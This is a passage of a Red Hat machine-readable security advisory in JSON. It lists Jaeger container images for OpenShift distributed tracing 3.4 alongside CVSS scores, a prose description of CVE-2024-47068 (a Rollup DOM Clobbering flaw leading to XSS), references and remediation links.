"Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "vite: XSS via DOM Clobbering gadget found in vite bundled scripts" }, { "cve": "CVE-2024-47068", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-23T16:20:20.383320+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2314249" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Rollup module bundler for JavaScript. Certain versions are susceptible to a DOM Clobbering vulnerability when bundling scripts with properties from `import.meta` such as `import.meta.url` in the `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements are present, for example, an `img` tag with an unsanitized `name` attribute.", "title": "Vulnerability description" }, { "category": "summary", "text": "rollup: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", "title": "Vulnerability summary" }, { "category": "other", "text": "This vulnerability is classified as moderate severity rather than important because it requires a specific and relatively uncommon attack vector to exploit\u2014namely, attacker-controlled scriptless HTML elements, such as an unsanitized name attribute in an img tag, which are typically less prevalent in well-maintained web applications. Additionally, the impact is limited to scenarios where import.meta is improperly handled in specific module formats (`cjs`, `umd`, `iife`), and the vulnerability can only lead to cross-site scripting (XSS) under specific conditions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-47068" }, { "category": "external", "summary": "RHBZ#2314249", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314249" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-47068", "url": "https://www.cve.org/CVERecord?id=CVE-2024-47068" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" }, { "category": "external", "summary": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" }, { "category": "external", "summary": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" }, { "category": "external", "summary": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4", "url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" }, { "category": "external", "summary": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541", "url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" }, { "category": "external", "summary": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm", "url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" } ], "release_date": "2024-09-23T16:15:06.947000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 